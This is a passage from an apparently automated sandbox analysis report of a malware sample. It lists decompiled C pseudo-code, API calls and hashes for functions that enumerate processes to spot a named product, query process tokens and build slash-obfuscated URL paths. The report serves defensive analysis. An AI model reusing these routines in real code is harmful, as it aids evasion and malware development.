                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: dbc07b9c14dd79280fced565f96108a712568335477b0945a4f650ccaf5d0a84
                                                          • Instruction ID: 871477f953243c6201d9e4e2682b8ec34749a88a7cde2dcd40ecc8b1499eaa29
                                                          • Opcode Fuzzy Hash: dbc07b9c14dd79280fced565f96108a712568335477b0945a4f650ccaf5d0a84
                                                          • Instruction Fuzzy Hash: 9421A4B2900219ABDF10BFF888848AEB7B9EF54354B014429EE11E7300F735B985DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E046717E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x467d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x467d250; // 0x8dd6c59d
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x467d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04671C49,00000000,?,?,046720C2,?,04AF95B0), ref: 046717F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04671808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04671C49,00000000,?,?,046720C2,?,04AF95B0), ref: 0467184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0467186D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: e2b53783b449722cbf6a298b02008088a719ca01a723f89cf545b90b5169ddbf
                                                          • Instruction ID: 2ef0961e1eab17aa8b344270a5d004ad50a6d3c82b2f4d22ed710a064084bb0b
                                                          • Opcode Fuzzy Hash: e2b53783b449722cbf6a298b02008088a719ca01a723f89cf545b90b5169ddbf
                                                          • Instruction Fuzzy Hash: E1110672A00114AFD3148FA9DC84E9EBBBADF91260B1502BAF6049B240FB749E0487A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0467486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E0467A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x467c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x467c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04AF95AC,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 04674889
                                                          • StrTrimA.SHLWAPI(?,0467C284,00000002,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748B3
                                                          • StrTrimA.SHLWAPI(00000001,0467C284,?,04675D25,?,0467243F,04AF95AC,?,04675D25), ref: 046748C5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E0467A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x467d2a8; // 0x47a5a8
                                                          						_t2 = _t9 + 0x467ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x467d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0467A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0467A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0467A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0467A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04676840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 0467684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04676863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04676870
                                                          • CloseHandle.KERNEL32(?), ref: 04676882
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04671B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x467d26c; // 0x318
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x467d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x467d26c; // 0x318
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x467d238; // 0x4700000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(00000318,00000001,04674F0E), ref: 04671B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04671B5C
                                                          • CloseHandle.KERNEL32(00000318), ref: 04671B7D
                                                          • HeapDestroy.KERNEL32(04700000), ref: 04671B8D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E046723F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x467d32c; // 0x4af95b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x467d32c; // 0x4af95b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x467d030) {
                                                          					HeapFree( *0x467d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E0467486F(_v0, _t14);
                                                          				_t11 =  *0x467d32c; // 0x4af95b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 046723FD
                                                          • Sleep.KERNEL32(0000000A,?,04675D25), ref: 04672407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04675D25), ref: 0467242F
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 0467244B
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E04676702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x467d32c; // 0x4af95b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x467d32c; // 0x4af95b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x467d32c; // 0x4af95b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x467e81a) {
                                                          					HeapFree( *0x467d238, 0, _t10);
                                                          					_t7 =  *0x467d32c; // 0x4af95b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 0467670B
                                                          • Sleep.KERNEL32(0000000A,?,04675D25), ref: 04676715
                                                          • HeapFree.KERNEL32(00000000,?,?,04675D25), ref: 04676743
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 04676758
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 8aa4a01340be9a7cdcc0efbc7fd76ed8c541d4ee4a25689f91352f241c5b9094
                                                          • Instruction ID: a7639f385cae44cb9949fb23ce56c45e3550c98d66aee9e3f01852d7c108952e
                                                          • Opcode Fuzzy Hash: 8aa4a01340be9a7cdcc0efbc7fd76ed8c541d4ee4a25689f91352f241c5b9094
                                                          • Instruction Fuzzy Hash: D0F0B2746001009BE71CCF64D999F1577E5EF59764B04A409E906DB360F679BC00CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04675AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E0467A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E0467A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E0467A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E0467A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E0467A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000), ref: 04675AFD
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                            • Part of subcall function 0467A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04675B2B,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102), ref: 0467A790
                                                            • Part of subcall function 0467A782: StrChrA.SHLWAPI(?,0000003F,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000,00000000), ref: 0467A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102,046767B8,?), ref: 04675B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04675B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04675B77
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 7e40cb94870d110d0fb824e8625a6608d50fba0c28fe9f2eb3e7a3fa01f73996
                                                          • Instruction ID: 2d447263aa284ad868fc96f47b97bcce14ff140f08ef5c0d6c4a9f119bff15ce
                                                          • Opcode Fuzzy Hash: 7e40cb94870d110d0fb824e8625a6608d50fba0c28fe9f2eb3e7a3fa01f73996
                                                          • Instruction Fuzzy Hash: 2721DF76504219FFDB126FB4CC54AAEBFB9EF16694B044098F9069F200FB35E90187E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E046745C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E0467A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04AF935C,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745D6
                                                          • lstrlenW.KERNEL32(04678D93,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745DD
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04678D93,004F0053,04AF935C,?,?,?,?,?,?,0467523E), ref: 046745FD
                                                          • memcpy.NTDLL(74B069A0,04678D93,00000002,00000000,004F0053,74B069A0,?,?,04678D93,004F0053,04AF935C), ref: 04674610
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 87dba54637b2f9b368697f4bfd7f3466cf8bcceb4535d4c2805c36cb1426a5d3
                                                          • Instruction ID: 8625cb61a805b00b979a18e7c54ce320a5662c984058c66fb15e90240142983e
                                                          • Opcode Fuzzy Hash: 87dba54637b2f9b368697f4bfd7f3466cf8bcceb4535d4c2805c36cb1426a5d3
                                                          • Instruction Fuzzy Hash: DCF0F976900119BBDF11EFA9CC84C9F7BACEF492687154066EA04D7201FB35EA149BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                          • lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: f951adf69a7d38f0b58d31e442a030d49b31a90ec70e6f2f773cab1fa33e05f7
                                                          • Instruction ID: 01d33ea8c5c9175a756ca91c86abd8ba0e8a73cfba52fba0926ba488822b5139
                                                          • Opcode Fuzzy Hash: f951adf69a7d38f0b58d31e442a030d49b31a90ec70e6f2f773cab1fa33e05f7
                                                          • Instruction Fuzzy Hash: 35E01273501621A78715ABE4AC48C6FBBADEF99651704041BF700D3210E72A9D059BE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E02B95A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E02B9A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E02B9A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02B95A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02B95A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B95A9D
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B95ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02B95AC7
                                                          • NtClose.NTDLL(?), ref: 02B95AD9
                                                          • NtClose.NTDLL(00000000), ref: 02B95AE3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 179600a991d482f1bb92ea0d361407a94d72853553e6f86c36cb121b4b3ef93a
                                                          • Instruction ID: 635c5fae104959a36c5bf643840d18210bc044846df52dc1a402e3de8936b069
                                                          • Opcode Fuzzy Hash: 179600a991d482f1bb92ea0d361407a94d72853553e6f86c36cb121b4b3ef93a
                                                          • Instruction Fuzzy Hash: 262116B2940218BBDF11AFA5DC85ADEBFBDEF08780F108062F905E6110D7719A549BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E02B94AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
